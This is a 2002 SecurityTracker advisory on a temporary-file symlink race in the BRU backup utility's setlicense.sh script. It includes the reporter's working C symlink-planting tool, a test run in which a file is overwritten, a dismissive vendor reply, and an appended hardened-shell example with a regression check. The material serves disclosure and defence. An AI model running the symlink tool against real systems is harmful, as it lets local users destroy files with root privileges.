SecurityTracker.com
Category:  Application (Generic)  >  BRU
Vendors:  TOLIS Group, Inc.
BRU Backup Utility Has Temporary File Symlink Bug That Lets Local Users Overwrite Any File on the System
Date:  Jan 28 2002
Impact:  Denial of service via local system, Modification of system information, Modification of user information
Exploit Included:  Yes  
Description:  A vulnerability was reported in the BRU file backup application. A local user can overwrite any file on the system.

It is reported that BRU creates unsafe temporary files with a predictable filename based on the process id (pid) of the 'setlicense.sh' script. A local user can create a symbolic link from the predicted temporary file name to another critical file on the system. Then, when the BRU utility is executed (by a root user, as would be normal), the linked file will be overwritten with the text 'foobar' with root level privileges.

A demonstration exploit is provided in the Source Message.

Impact:  A local unprivileged user can cause any file on the system to be overwritten.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.tolisgroup.com/bru3.html
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  "Andrew Griffiths" <andrewg@tasmail.com>
Message History:   None.


 Source Message Contents

Date:  Sat, 26 Jan 2002 21:00:55 +1100 (EST)
From:  "Andrew Griffiths" <andrewg@tasmail.com>
Subject:  bru backup program

 

Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers options 
for most conceivable data backup and  recovery  needs.  BRU is fully device 
independent, so it works with any device or filesystem that  is  supported by 
your operating system.  Verification is performed automatically with BRU's 
Autoscan feature and can also be performed  days,  weeks, or even years after 
a backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts, which allows
you to overwrite arbitrary files with foobar. Since this script would most 
likely be run by root, it allows you to overwrite any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who don't know,
$$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic links in the
temp directory pointing to the file you want to overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com)    */

int main(int argc, char **argv)
{
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
}

Vendor Response:
----------------

This doesn't make much sense to me, exploiting your own system while you are already root? Correct me
if I am wrong but this doesn't make much sense to me.

--Mike
BRU Support Team
The TOLIS Group - http://www.tolisgroup.com
support@tolisgroup.com

I think he didn't like my example down there. Everyone else on the list should be able to understand
it without the need for a # sign...

Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist. BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$

--
www.tasmail.com
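
The temporary-file pattern reported in this entry, set beside hardened forms, as an added example (not code from BRU, TOLIS Group, or the original message). The function names and the scratch-directory regression check are assumptions made for illustration; probe_legacy reproduces the reported setlicense pattern with the directory made a parameter so it can be exercised outside /tmp.

```shell
#!/bin/sh
# Added example, not BRU's code. All function names are hypothetical.

# Legacy pattern from the setlicense fragment: a predictable name built
# from $$ and opened with a plain redirect, which follows symlinks.
probe_legacy() {
    printf "%s" foobar >"$1/brutest.$$" 2>&1
    res=$(cat "$1/brutest.$$")
    rm -f "$1/brutest.$$"
    [ "$res" = "foobar" ]
}

# Hardened form: mktemp picks an unpredictable name and creates the file
# exclusively, so a path that already exists (a planted symlink
# included) is never opened.
probe_hardened() {
    tmp=$(mktemp "$1/brutest.XXXXXXXXXX") || return 2
    printf "%s" foobar >"$tmp" 2>&1
    res=$(cat "$tmp")
    rm -f "$tmp"
    [ "$res" = "foobar" ]
}

# Simplest fix: this probe needs no file at all.
probe_nofile() {
    [ "$(printf "%s" foobar 2>/dev/null)" = "foobar" ]
}

# Regression check, run entirely inside a private scratch directory:
# place a symlink at the name the legacy code would use, run the probe
# named in $1, then print the protected file's content.
# "hello world" means the link was not followed.
check_probe() {
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/probecheck.XXXXXXXXXX") || return 2
    echo "hello world" >"$scratch/protected"
    ln -s "$scratch/protected" "$scratch/brutest.$$"
    "$1" "$scratch" >/dev/null 2>&1 || :
    cat "$scratch/protected"
    rm -rf "$scratch"
}
```

check_probe probe_legacy prints foobar and check_probe probe_hardened prints hello world, which makes it usable as a regression test when auditing install scripts that are run as root.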



Copyright 2002, SecurityGlobal.net LLC